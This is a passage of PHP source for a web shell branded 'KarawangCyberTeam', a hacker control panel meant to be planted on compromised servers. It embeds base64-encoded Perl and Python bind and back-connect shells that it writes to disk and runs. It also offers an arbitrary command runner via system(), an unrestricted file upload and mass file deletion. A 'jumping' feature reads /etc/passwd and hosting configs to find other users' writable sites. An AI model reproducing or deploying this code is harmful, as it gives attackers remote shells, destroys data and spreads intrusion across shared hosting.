href=melepaskanmu45@gmail.com\'>melepaskanmu45@gmail.com</a>\r\n\t\t</div>\r\n\t</div>\r\n</div>\r\n<br/>";\r\n}\r\n// network\r\nif($nana[\'id\'] == \'network\'){\r\ns();\r\n\tprint "\r\n<h4>Back Connect Tools</h4>\r\n<form action=\'?dir=$path&id=network\' method=\'post\'>\r\n\t<u>Bind port to /bin/sh [Perl]</u><br>\r\n\t<u>Port :</u>\r\n\t<div class=\'input-group\'>\r\n\t\t<input class=\'form-control btn-sm\' type=\'text\' name=\'port\' placeholder=\'6969\'>\r\n\t\t<input class=\'btn btn-outline-light btn-sm\' type=\'submit\' name=\'bpl\' value=\'submit\'>\r\n\t</div>\r\n<h5>Back-Connect</h5>\r\n\t<u>Server :</u>\r\n\t\t<input class=\'form-control btn-sm\' type=\'text\' name=\'server\' placeholder=\'". $_SERVER[\'REMOTE_ADDR\'] ."\'>\r\n\t<u>Port :</u>\r\n\t<div class=\'input-group\'>\r\n\t\t<input class=\'form-control btn-sm\' type=\'text\' name=\'port\' placeholder=\'6969\'>\r\n\t\t<select class=\'form-control btn-sm\' name=\'bc\'>\r\n\t\t\t<option value=\'perl\'>perl</option>\r\n\t\t\t<option value=\'python\'>python</option>\r\n\t\t</select>\r\n\t</div>\r\n<input class=\'btn btn-outline-light btn-block btn-sm\' type=\'submit\' value=\'submit\'>\r\n</form>";\r\nif($_POST[\'bpl\']){\r\n\t$bp = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=");\r\n\t$brt = @fopen(\'bp.pl\',\'w\');\r\n\tfwrite($brt,$bp);\r\n\t$out = exe("perl bp.pl ".$_POST[\'port\']." 1>/dev/null 2>&1 &");\r\n\tsleep(1);\r\n\techo "<pre class=\'pre\'>$out\\n".exe("ps aux | grep bp.pl")."</pre>";\r\n\tunlink("bp.pl");\r\n}\r\nif($_POST[\'bc\'] == \'perl\'){\r\n\t$bc = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7");\r\n\t$plbc = @fopen(\'bc.pl\',\'w\');\r\n\tfwrite($plbc,$bc);\r\n\t$out = exe("perl bc.pl ".$_POST[\'server\']." ".$_POST[\'port\']." 1>/dev/null 2>&1 &");\r\n\tsleep(1);\r\n\tprint "<pre class=\'pre\'>$out\\n".exe("ps aux | grep bc.pl")."</pre>";\r\n\tunlink("bc.pl");\r\n}\r\nif($_POST[\'bc\'] == \'python\'){\r\n\t$bc_py = base64_decode("IyEvdXNyL2Jpbi9weXRob24NCiNVc2FnZTogcHl0aG9uIGZpbGVuYW1lLnB5IEhPU1QgUE9SVA0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KaXBsbyA9IHN5cy5hcmd2WzFdDQpwb3J0bG8gPSBpbnQoc3lzLmFyZ3ZbMl0pDQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQoNjApDQpkZWYgcHliYWNrY29ubmVjdCgpOg0KICB0cnk6DQogICAgam1iID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkNCiAgICBqbWIuc2VuZCgnJydcblB5dGhvbiBCYWNrQ29ubmVjdCBCeSBNci54QmFyYWt1ZGFcblRoYW5rcyBHb29nbGUgRm9yIFJlZmVyZW5zaVxuXG4nJycpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMCkNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwxKQ0KICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDIpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMykNCiAgICBzaGVsbCA9IHN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKQ0KICBleGNlcHQgc29ja2V0LnRpbWVvdXQ6DQogICAgcHJpbnQgIlRpbU91dCINCiAgZXhjZXB0IHNvY2tldC5lcnJvciwgZToNCiAgICBwcmludCAiRXJyb3IiLCBlDQpweWJhY2tjb25uZWN0KCk=");\r\n\t$pbc_py = @fopen(\'bcpy.py\',\'w\');\r\n\tfwrite($pbc_py,$bc_py);\r\n\t$out_py = exe("python bcpy.py ".$_POST[\'server\']." ".$_POST[\'port\']);\r\n\tsleep(1);\r\n\tprint "<pre class=\'pre\'>$out_py\\n".exe("ps aux | grep bcpy.py")."</pre>";\r\n\tunlink("bcpy.py");\r\n\t}\r\n}\r\n// phpinfo \r\nif($nana[\'id\'] == \'phpinfo\'){\r\n\t@ob_start();\r\n\t@eval("phpinfo();");\r\n\t$buff = @ob_get_contents();\r\n\t@ob_end_clean();\t\r\n\t$awal = strpos($buff,"<body>")+6;\r\n\t$akhir = strpos($buff,"</body>");\r\n\tprint "<pre class=\'php_info\'>".substr($buff,$awal,$akhir-$awal)."</pre>";\r\n\texit;\r\n}\r\n// cmd\r\nif($nana[\'id\'] == \'cmd\') {\r\ns();\r\nif($nana[\'ekseCMD\']) {\r\n$result = $nana[\'ekseCMD\'];\r\nprint "<div class=\'shell bg-dark\'>\r\n<pre class=\'pre text-light\'><b>KarawangCyberTeam<cmd>@</cmd>cmd#:~</b> <cmd>$result</cmd><br>";\r\n\tsystem($nana[\'ekseCMD\'].\' 2>&1\');\r\n\tprint "</pre></div>";\r\n}\r\nprint "\r\n<form action=\'?dir=$path&id=cmd\' method=\'POST\'>\r\n\t<div class=\'input-group\'>\r\n\t\t<div class=\'input-group-text\'><i class=\'bi bi-terminal\'></i></div><input class=\'form-control form-control-sm\' type=\'text\' name=\'ekseCMD\' value=\'$result\'>\r\n\t</div>\r\n</form>";\r\n// upload\r\n} if($nana[\'id\'] == \'upload\'){\r\nif(isset($_FILES[\'file\'])){\r\nif(copy($_FILES[\'file\'][\'tmp_name\'],$dir.\'/\'.$_FILES[\'file\'][\'name\'])){\r\nprint \'<strong>Upload</strong> ok! \'.alt_ok().\'</div>\';\r\n}else{\r\nprint \'<strong>Upload</strong> fail! \'.alt_fail().\'</div>\';\r\n}\r\n\t}\r\ns();\r\nprint "\r\n<form action=\'?dir=$path&id=upload\' method=\'POST\' enctype=\'multipart/form-data\'>\r\n\t<div class=\'input-group mb-3\'>\r\n\t\t<input class=\'form-control form-control-sm\' type=\'file\' name=\'file\'>\r\n\t\t<button class=\'btn btn-outline-light btn-sm\' type=\'submit\'><i class=\'bi bi-arrow-return-right\'></i></button>\r\n\t</div>\r\n</form>";\r\n}\r\n// mass delete #indoxploit\r\nif($nana[\'id\'] == \'delete\'){\r\nfunction hapus_massal($dir,$namafile) {\r\n\tif(is_writable($dir)) {\r\n\t\t$dira = scandir($dir);\r\n\t\tforeach($dira as $dirb) {\r\n\t\t\t$dirc = "$dir/$dirb";\r\n\t\t\t$▚ = $dirc.\'/\'.$namafile;\r\n\t\t\tif($dirb === \'.\') {\r\n\t\t\t\tif(file_exists("$dir/$namafile")) {\r\n\t\t\t\t\tunlink("$dir/$namafile");\r\n\t\t\t\t}\r\n\t\t\t} elseif($dirb === \'..\') {\r\n\t\t\t\tif(file_exists("".dirname($dir)."/$namafile")) {\r\n\t\t\t\t\tunlink("".dirname($dir)."/$namafile");\r\n\t\t\t\t}\r\n\t\t\t} else {\r\n\t\t\t\tif(is_dir($dirc)) {\r\n\t\t\t\t\tif(is_writable($dirc)) {\r\n\t\t\t\t\t\tif(file_exists($▚)) {\r\n\t\t\t\t\t\t\tprint "<pre>[<cmd>deleted</cmd>] $▚</pre>";\r\n\t\t\t\t\t\t\tunlink($▚);\r\n\t\t\t\t\t\t\t$▟ = hapus_massal($dirc,$namafile);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n} if($nana[\'start\']) {\r\nprint "<div style=\'margin: 5px auto; padding: 5px\'>";\r\n\thapus_massal($nana[\'d_dir\'], $nana[\'d_file\']);\r\nprint "</div>";\r\n} else {\r\ns();\r\nprint "\r\n<form action=\'?dir=$path&id=delete\' method=\'POST\'>\r\n\t<b><i class=\'bi bi-folder\'></i> Directory:</b>\r\n\t<input class=\'form-control btn-sm\' type=\'text\' name=\'d_dir\' value=\'$dir\'>\r\n\t<b><i class=\'bi bi-file-earmark\'></i> File name:</b>\r\n\t<div class=\'input-group mb-3\'>\r\n\t<input class=\'form-control btn-sm\' type=\'text\' name=\'d_file\' placeholder=\'name file\'>\r\n\t<input class=\'btn btn-outline-light btn-sm\' type=\'submit\' name=\'start\' value=\'Go\'>\r\n</form>\r\n\t</div>";\r\n\t\t}\r\n\t}\r\n}\r\n//zip & unzip Karawang Cyber Team\r\nif($nana[\'id\'] == \'zip\'){\r\n$exzip = basename($dir).\'.zip\';\r\nfunction Zip($source, $destination){\r\n\tif (extension_loaded(\'zip\') === true){\r\n\t\tif (file_exists($source) === true){\r\n\t\t\t$zip = new ZipArchive();\r\n\t\t\tif ($zip->open($destination, ZIPARCHIVE::CREATE) === true){\r\n\t\t\t\t$source = realpath($source);\r\n\t\t\t\tif (is_dir($source) === true){\r\n\t\t\t\t\t$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);\r\n\t\t\t\t\tforeach ($files as $file){\r\n\t\t\t\t\t\t$file = realpath($file);\r\n\t\t\t\t\t\tif (is_dir($file) === true){\r\n\t\t\t\t\t\t\t// $zip->addEmptyDir(str_replace($source . \'/\', \'\', $file . \'/\'));\r\n\t\t\t\t\t\t}elseif(is_file($file) === true){\r\n\t\t\t\t\t\t\t$zip->addFromString(str_replace($source . \'/\', \'\', $file), file_get_contents($file));\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}elseif(is_file($source) === true){\r\n\t\t\t\t\t$zip->addFromString(basename($source), file_get_contents($source));\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\treturn @$zip->close();\r\n\t\t}\r\n\t}\r\n\treturn false;\r\n}\r\n//Extract/Unzip\r\nfunction Zip_Extrack($zip_files, $to_dir){\r\n\t$zip = new ZipArchive();\r\n\t$res = $zip->open($zip_files);\r\n\tif ($res === TRUE){\r\n\t\t$name = basename($zip_files, ".zip")."_unzip";\r\n\t\t@mkdir($name);\r\n\t\t@$zip->extractTo($to_dir."/".$name); \r\n\t\treturn @$zip->close();\r\n\t}else{\r\n\t\treturn false;\r\n\t}\r\n}\r\ns();\r\nprint "\r\n<div class=\'container\'>\r\n\t<div class=\'card text-dark\'>\r\n\t\t<div class=\'card-header\'>\r\n\t<b>Zip Menu</b>\r\n\t<form action=\'?dir=$path&id=zip\' enctype=\'multipart/form-data\' method=\'POST\'>\r\n\t\t<div class=\'input-group mb-3\'>\r\n\t\t\t<input class=\'form-control form-control-sm\' type=\'file\' name=\'zip_file\'>\r\n\t\t\t<input class=\'btn btn-dark btn-sm\' type=\'submit\' name=\'upnun\' value=\'Submit\'>\r\n\t\t</div>\r\n\t</form>";\r\n\tif($nana["upnun"]){\r\n\t\t$filename = $_FILES["zip_file"]["name"];\r\n\t\t$tmp = $_FILES["zip_file"]["tmp_name"];\r\n\t\tif(move_uploaded_file($tmp, "$dir/$filename")){\r\n\t\t\tprint Zip_Extrack($filename, $dir);\r\n\t\t\tunlink($filename);\r\nprint \'<strong>Ekstrak zip</strong> ok! \'.alt_ok().\'</div>\';\r\n\t\t}else{\r\nprint \'<strong>Ekstrak zip</strong> fail! \'.alt_fail().\'</div>\';\r\n\t\t}\r\n\t}\r\nprint "\r\n<b>Zip backup</b>\r\n<form action=\'?dir=$path&id=zip\' method=\'POST\'>\r\n\t<label>location:</label>\r\n\t<div class=\'input-group mb-3\'>\r\n\t\t<input class=\'form-control form-control-sm\' type=\'text\' name=\'folder\' value=\'$dir\'>\r\n\t\t<input class=\'btn btn-dark btn-sm\' type=\'submit\' name=\'backup\' value=\'Submit\'>\r\n\t</div>\r\n</form>";\r\n\tif($nana[\'backup\']){\r\n\t\t$fol = $nana[\'folder\'];\r\n\t\tif(Zip($fol, $nana["folder"].\'/\'.$exzip)){\r\nprint \'<strong>Created Zip</strong> ok! \'.alt_ok().\'</div>\';;\r\n\t\t}else{\r\nprint \'<strong>Created Zip</strong> fail! \'.alt_ok().\'</div>\';\r\n\t\t}\r\n\t}\r\nprint "\r\n<b>Unzip manual</b>\r\n\t<form action=\'?dir=$path&id=zip\' method=\'POST\'>\r\n\t\t<label>location:</label>\r\n\t\t\t<div class=\'input-group mb-3\'>\r\n\t\t\t<input class=\'form-control form-control-sm\' type=\'text\' name=\'file_zip\' value=\'$dir/$exzip\'>\r\n\t\t\t<input class=\'btn btn-dark btn-sm\' type=\'submit\' name=\'extrak\' value=\'Submit\'>\r\n\t\t</div>\r\n\t</form>\r\n\t</div>\r\n</div>\r\n</div>\r\n<br/>";\r\n\tif($nana[\'extrak\']){\r\n\t\t$zip = $nana["file_zip"];\r\n\t\tif (Zip_Extrack($zip, $dir)){\r\nprint \'<strong>Ekstrak zip</strong> ok! \'.alt_ok().\'</div>\';\r\n\t\t}else{\r\nprint \'<strong>Ekstrak zip</strong> fail! \'.alt_fail().\'</div>\';\r\n\t\t}\r\n\t}\r\n}\r\n// jumping #Karawang Cyber Team\r\nif($nana[\'id\'] == \'jumping\') {\r\ns();\r\n\t$i = 0;\r\nprint "\r\n<div class=\'container\'>\r\n\t<div class=\'card text-dark\'>\r\n\t<div class=\'card-header\'>";\r\n\tif(preg_match("/hsphere/", $dir)) {\r\n\t\t$urls = explode("\\r\\n", $nana[\'url\']);\r\n\t\tif(isset($nana[\'jump\'])) {\r\n\t\t\tprint "<pre>";\r\n\t\t\tforeach($urls as $url) {\r\n\t\t\t\t$url = str_replace(array("https://","www."), "", strtolower($url));\r\n\t\t\t\t$etc = "/etc/passwd";\r\n\t\t\t\t$f = fopen($etc,"r");\r\n\t\t\t\twhile($gets = fgets($f)) {\r\n\t\t\t\t\t$pecah = explode(":", $gets);\r\n\t\t\t\t\t$user = $pecah[0];\r\n\t\t\t\t\t$dir_user = "/hsphere/local/home/$user";\r\n\t\t\t\t\tif(is_dir($dir_user) === true) {\r\n\t\t\t\t\t\t$url_user = $dir_user."/".$url;\r\n\t\t\t\t\t\tif(is_readable($url_user)) {\r\n\t\t\t\t\t\t\t$i++;\r\n\t\t\t\t\t\t\t$jrw = "[<cmd>R</cmd>] <a class=\'text-decoration-none\' onclick=\'c(\\"?dir=$url_user\\")\'>$url_user</a>";\r\n\t\t\t\t\t\t\tif(is_writable($url_user)) {\r\n\t\t\t\t\t\t\t\t$jrw = "[<cmd>RW</cmd>] <a class=\'text-decoration-none\' onclick=\'c(\\"?dir=$url_user\\")\'>$url_user</a>";\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\tprint $jrw."<br>";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\tif($i == 0) { \r\n\t\t} else {\r\n\t\t\tprint "<br>Totally available $i from ip ".gethostbyname($_SERVER[\'HTTP_HOST\']);\r\n\t\t}\r\n\t\tprint "</pre>";\r\n} else {\r\nprint "\r\n<div class=\'text-center\'>\r\n\t<form action=\'?dir=$path&id=jumping\' method=\'POST\'>\r\n\t<b>List Domains:</b><br>\r\n\t\t<textarea class=\'form-control btn-sm\' rows=\'10\' name=\'url\'>";\r\n\t\t\t$fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");\r\n\t\t\t\twhile($getss = fgets($fp)) {\r\n\t\t\t\tprint $getss;\r\n\t\t\t\t}\r\n\t\tprint \'</textarea><br>\r\n\t\t<input class="btn btn-outline-light btn-sm btn-block" type="submit" name="jump" value="Jumping">\r\n\t</form>\r\n</div>\';\r\n\t\t}\r\n\t} elseif(preg_match("/vhosts|vhost/", $dir)) {\r\n\t\tpreg_match("/\\/var\\/www\\/(.*?)\\//", $dir, $vh);\r\n\t\t$urls = explode("\\r\\n", $nana[\'url\']);\r\n\t\tif(isset($nana[\'jump\'])) {\r\n\t\t\tprint "<pre>";\r\n\t\t\tforeach($urls as $url) {\r\n\t\t\t\t$url = str_replace("www.", "", $url);\r\n\t\t\t\t$web_vh = "/var/www/".$vh[1]."/$url/httpdocs";\r\n\t\t\t\tif(is_dir($web_vh) === true) {\r\n\t\t\t\t\tif(is_readable($web_vh)) {\r\n\t\t\t\t\t\t$i++;\r\n\t\t\t\t\t\t$jrw = "[<cmd>R</cmd>] <a class=\'text-decoration-none\' onclick=\'c(\\"?dir=$web_vh\\")\'>$web_vh</a>";\r\n\t\t\t\t\t\tif(is_writable($web_vh)) {\r\n\t\t\t\t\t\t\t$jrw = "[<cmd>RW</cmd>] <a class=\'text-decoration-none\' onclick=\'c(\\"?dir=$web_vh\\")\'>$web_vh</a>";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\tprint $jrw."<br>";\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\tif($i == 0) { \r\n\t\t} else {\r\n\t\t\tprint "<br>Totally available $i from ip ".gethostbyname($_SERVER[\'HTTP_HOST\']);\r\n\t\t}\r\n\tprint "</pre>";\r\n} else {\r\nprint "\r\n<div class=\'text-center\'>\r\n\t<form action=\'?dir=$path&id=jumping\' method=\'POST\'>\r\n\t<b>List Domains:</b> <br>\r\n\t\t<textarea class=\'form-control btn-sm\' rows=\'10\' name=\'url\'>";\r\n\t\t\tbing("ip:".gethostbyname($_SERVER[\'HTTP_HOST\'])."");\r\n\t\tprint \'</textarea><br>\r\n\t\t<input class="btn btn-outline-light btn-sm btn-block" type="submit" name="jump" value="Jumping">\r\n\t</form>\r\n</div>\';\r\n\t\t}\r\n\t} else {\r\n\t\tprint "<pre>";\r\n\t\t$etc = fopen("/etc/passwd", "r") or print("<rd>Can\'t read /etc/passwd</rd>");\r\n\t\twhile($passwd = fgets($etc)) {\r\n\t\t\tif($passwd == \'\' || !$etc) {\r\n\t\t\t\tprint "<rd>Can\'t read /etc/passwd</rd>";\r\n\t\t\t} else {\r\n\t\t\t\tpreg_match_all(\'/(.*?):x:/\', $passwd, $user_jumping);\r\n\t\t\t\tforeach($user_jumping[1] as $user_idx_jump) {\r\n\t\t\t\t\t$user_jumping_dir = "/home/$user_idx_jump/public_html";\r\n\t\t\t\t\tif(is_readable($user_jumping_dir)) {\r\n\t\t\t\t\t\t$i++;\r\n\t\t\t\t\t\t$jrw = "[<cmd>R</cmd>] <a class=\'text-decoration-none\' onclick=\'c(\\"?dir=$user_jumping_dir\\")\'>$user_jumping_dir</a>";\r\n\t\t\t\t\t\tif(is_writable($user_jumping_dir)) {\r\n\t\t\t\t\t\t\t$jrw = "[<cmd>RW</cmd>] <a class=\'text-decoration-none\' onclick=\'c(\\"?dir=$user_jumping_dir\\")\'>$user_jumping_dir</a>";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\tprint $jrw;\r\n\t\t\t\t\t\tif(function_exists(\'posix_getpwuid\')) {\r\n\t\t\t\t\t\t\t$domain_jump = file_get_contents("/etc/named.conf");\t\r\n\t\t\t\t\t\t\tif($domain_jump == \'\') {\r\n\t\t\t\t\t\t\t\tprint " => ( <rd>can\'t get the domain name</rd> )<br>";\r\n\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\tpreg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);\r\n\t\t\t\t\t\t\t\tforeach($domains_jump[1] as $dj) {\r\n\t\t\t\t\t\t\t\t\t$user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));\r\n\t\t\t\t\t\t\t\t\t$user_jumping_url = $user_jumping_url[\'name\'];\r\n\t\t\t\t\t\t\t\t\tif($user_jumping_url == $user_idx_jump) {\r\n\t\t\t\t\t\t\t\t\t\tprint " => ( <u>$dj</u> )<br>";\r\n\t\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\tprint "<br>";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\tif($i == 0) { \r\n\t\t} else {\r\n\t\t\tprint "<br>Totally available $i from ip ".gethostbyname($_SERVER[\'HTTP_HOST\']);\r\n\t\t}\r\n\t\tprint "</pre>";\r\n\t}\r\n\tprint "</div>\r\n\t</div>\r\n</div><br/>";\r\n}\r\n//openfile\r\nif(isset($nana[\'opn\'])) {\r\n\t$file = $nana[\'opn\'];\r\n}\t\r\n// view\r\nif($nana[\'action\'] == \'view\') {\r\ns();\r\nprint "\r\n<div class=\'btn-group\'>\r\n\t<a class=\'btn btn-outline-light btn-sm\' onclick=\'c(\\"?dir=$path&action=view&opn=$file\\")\'><i class=\'bi bi-eye-fill\'></i></a>\r\n\t<a class=\'btn btn-outline-light btn-sm\' onclick=\'c(\\"?dir=$path&action=edit&opn=$file\\")\'><i class=\'bi bi-pencil-square\'></i></a>\r\n\t<a class=\'btn btn-outline-light btn-sm\' onclick=\'c(\\"?dir=$path&action=rename&opn=$file\\")\'><i class=\'bi bi-pencil-fill\'></i></a>\r\n\t<a class=\'btn btn-outline-light btn-sm\' onclick=\'c(\\"?dir=$path&action=delete_file&opn=$file\\")\'><i class=\'bi bi-trash-fill\'></i></a>\r\n\t<a class=\'btn btn-outline-light btn-sm\' onclick=\'c(\\"?dir=$path&action=download&opn=$file\\")\'><i class=\'bi bi-download\'></i></a>\r\n</div>\r\n<br>\r\n\t<b><i class=\'bi bi-file-earmark\'></i>: ".basename($file)."</b>\r\n</br>\r\n<textarea class=\'form-control btn-sm\' rows=\'10\' disabled=\'\'>".htmlspecialchars(file_get_contents($file))."</textarea><br/>";\r\n}\r\n// edit\r\nif(isset($nana[\'edit_file\'])) {\r\n\t$updt = fopen("$file", "w");\r\n\t$hasil = fwrite($updt, $nana[\'isi\']);\t\t\r\n\tif ($hasil) {\r\nprint \'<strong>Edit file</strong> ok! \'.alt_ok().\'</div>\';\r\n\t}else{\r\nprint \'<strong>Edit file</strong> fail! \'.alt_fail().\'</div>\';\r\n\t}\r\n}\r\nif($nana[\'action\'] == \'edit\') {\r\ns();\r\nprint "\r\n<div class=\'btn-group\'>\r\n\t<a class=\'btn btn-outline-light btn-sm\' onclick=\'c(\\"?dir=$path&action=view&opn=$file\\")\'><i class=\'bi bi-eye-fill\'></i></a>\r\n\t<a class=\'btn btn-outline-light btn-sm\' onclick=\'c(\\"?dir=$path&action=edit&opn=$file\\")\'><i class=\'bi bi-pencil-square\'></i></a>\r\n\t<a class=\'btn btn-outline-light btn-sm\' onclick=\'c(\\"?dir=$path&action=rename&opn=$file\\")\'><i class=\'bi bi-pencil-fill\'></i></a>\r\n\t<a class=\'btn btn-outline-light btn-sm\' onclick=\'c(\\"?dir=$path&action=delete_file&opn=$file\\")\'><i class=\'bi bi-trash-fill\'></i></a>\r\n\t<a class=\'btn btn-outline-light btn-sm\' onclick=\'c(\\"?dir=$path&action=download&opn=$file\\")\'><i class=\'bi bi-download\'></i></a>\r\n</div>\r\n<br>\r\n\t<b><i class=\'bi bi-file-earmark\'></i>: ".basename($file)."</b>\r\n</br>\r\n<form action=\'?dir=$path&action=edit&opn=$file\' method=\'POST\'>\r\n\t<textarea class=\'form-control btn-sm\' rows=\'10\' name=\'isi\'>".htmlspecialchars(file_get_contents($file))."</textarea>\r\n\t<br/>\r\n\t<button class=\'btn btn-outline-light btn-sm btn-block\' type=\'sumbit\' name=\'edit_file\'><i class=\'bi bi-arrow-return-right\'></i></button>\r\n</form>";\r\n}\r\n//rename folder\r\nif($nana[\'action\'] == \'rename_folder\') {\r\n\tif($nana[\'r_d\']) {\r\n\t\t$r_d = rename($dir, "".dirname($dir)."/".htmlspecialchars($nana[\'r_d\'])."");\r\n\t\tif($r_d) {\r\nprint \'<strong>Rename folder</strong> ok! \'.alt_ok().\'<a class="btn-close" href="?path=\'.dirname($dir).\'"></a></div>\';\r\n\t\t}else{\r\nprint \'<strong>Rename folder</strong> fail! \'.alt_fail().\'<a class="btn-close" href="?path=\'.dirname($dir).\'"></a></div>\';\r\n\t\t}\r\n\t}\r\ns();\r\nprint "\r\n<div class=\'btn-group\'>\r\n\t<a class=\'btn btn-outline-light btn-sm\' onclick=\'c(\\"?dir=$path&action=rename_folder\\")\'><i class=\'bi bi-pencil-fill\'></i></a>\r\n\t<a class=\'btn btn-outline-light btn-sm\' onclick=\'c(\\"?dir=$path&action=delete_folder\\")\'><i class=\'bi bi-trash-fill\'></i></a>\r\n</div>\r\n<br>\r\n\t<b><i class=\'bi bi-folder-fill\'></i>: ".basename($dir)."</b>\r\n</br>\r\n<form action=\'?dir=$path&action=rename_folder\' method=\'POST\'>\r\n<div class=\'input-group\'>\r\n\t<input class=\'form-control btn-sm\' type=\'text\' value=\'".basename($dir)."\' name=\'r_d\'>\r\n\t<button class=\'btn btn-outline-light btn-sm\' type=\'submit\'><i class=\'bi bi-arrow-return-right\'></i></button>\r\n</div>\r\n</form>";\r\n}\r\n//rename file\r\nif(isset($nana[\'r_f\'])) {\r\n\t$old = $file;\r\n\t$new = $nana[\'new_name\'];\r\n\trename($new, $old);\r\n\tif(file_exists($new)) {\r\nprint \'<div class="alert alert-warning alert-dismissible fade show my-3" role="alert">\r\n\t<strong>Rename file</strong> name already in use! <button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>\r\n</div>\';\r\n\t}else{\r\nif(rename($old, $new)) {\r\nprint \'<strong>Rename file</strong> ok! \'.alt_ok().\'</div>\';\r\n\t}else{\r\nprint \'<strong>Rename file</strong> fail! \'.alt_fail().\'</div>\';\r\n\t\t}\r\n\t}\r\n}\r\nif($nana[\'action\'] == \'rename\') {\r\ns();\r\nprint "\r\n<div class=\'btn-group\'>\r\n\t<a class=\'btn btn-outline-light btn-sm\' onclick=\'c(\\"?dir=$path&action=view&opn=$file\\")\'><i class=\'bi bi-eye-fill\'></i></a>\r\n\t<a class=\'btn btn-outline-light btn-sm\' onclick=\'c(\\"?dir=$path&action=edit&opn=$file\\")\'><i class=\'bi bi-pencil-square\'></i></a>\r\n\t<a class=\'btn btn-outline-light btn-sm\' onclick=\'c(\\"?dir=$path&action=rename&opn=$file\\")\'><i class=\'bi bi-pencil-fill\'></i></a>\r\n\t<a class=\'btn btn-outline-light btn-sm\' onclick=\'c(\\"?dir=$path&action=delete_file&opn=$file\\")\'><i class=\'bi bi-trash-fill\'></i></a>\r\n\t<a class=\'btn btn-outline-light btn-sm\' onclick=\'c(\\"?dir=$path&action=download&opn=$file\\")\'><i class=\'bi bi-download\'></i></a>\r\n</div>\r\n<br>\r\n\t<b><i class=\'bi bi-file-earmark\'></i>: ".basename($file)."</b>\r\n</br>\r\n<form action=\'?dir=$path&action=rename&opn=$file\' method=\'POST\'>\r\n<div class=\'input-group\'>\r\n\t<input class=\'form-control btn-sm\' type=\'text\' name=\'new_name\' value=\'".basename($file)."\'>\r\n\t<button class=\'btn btn-outline-light btn-sm\' type=\'sumbit\' name=\'r_f\'><i class=\'bi bi-arrow-return-right\'></i></button>\r\n</div>\r\n</form>";\r\n}\r\n//delete file\r\nif 